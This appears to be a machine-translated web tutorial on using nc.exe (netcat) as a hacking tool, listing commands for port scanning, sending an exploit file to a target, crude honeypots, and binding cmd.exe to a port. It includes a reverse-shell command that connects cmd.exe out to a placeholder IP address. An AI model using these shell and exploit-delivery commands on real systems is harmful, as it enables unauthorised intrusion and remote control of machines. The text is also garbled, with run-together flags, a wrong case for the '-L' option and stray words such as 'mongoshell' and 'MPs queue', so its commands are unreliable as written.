Nc.exe listener Tool
NC. EXE is often used as a hacker tool. The main usage is as follows:
1) connect to the remote host. Example: NC-nvv 192.168.x.x 80: connect to port tcp80 of 192.168.x.x
2) Listen to the local host, for example, in the format of NC-l-P 80
3) scan the remote host. For example: NC-nvv-W2-Z 192.168.x.x 80-445: scan all ports of 192.168.x.x from tcp80 to tcp445.
4) bind the remote host to a shell. For example, the format is NC-l-P 5354-t-e c: \ winnt \ system32 \ cmd.exe: bind the shell of the remote host to the tcp5354 port of the remote host.
5) bind a shell to the remote host and perform reverse connection. For example, the format is NC-t-e c: \ winnt \ system32 \ cmd.exe 192.168.x.x 5354: bind the remote host's mongoshell and reversely connect to the tcp5354 port of 192.168.x.x. The above are the most basic usage (in fact, there are many usage of NC, when combined with pipeline commands "|" and redirection commands "<", ">", and so on, the command functions are more powerful ......).
Advanced usage:
6) for the attack program, example: Format 1: type.exe c: \ exploit.txt | nc-nvv 192.168.x.x 80 Format 2: nc-nvv192.168.x.x80 Description: connect to port 80 of 192.168.x.x, and send the 'C: \ ex ploit.txt 'content in its pipeline (the two formats have the same effect, which is exactly the same: p) attached: 'C: \ exploit.txt 'is shellcode, etc.
7) use [1] As a honeypot. For example, in the format of NC-l-P 80, You can constantly listen to a port by using '-l' (note that l is capitalized, until Ctrl + c
8) Use a honeypot [2]. For example, the format is NC-l-P 80> C: \ log.txt. You can use '-l' to continuously listen to a port, wait until Ctrl + C and output the result to 'C: \ log.txt '. If' & gt; 'is changed to'> ', you can append the log with: 'C: \ log.txt 'indicates logs, etc.
9) for honeypot [3], example: Format 1: NC-l-P 80
Format 2: type.exe c: \ honeypot.txt | nc-l-P 80 Description: You can use '-l' to constantly listen to a port until Ctrl + C, and send the content of 'c: \ honeypot.txt 'to the MPs queue.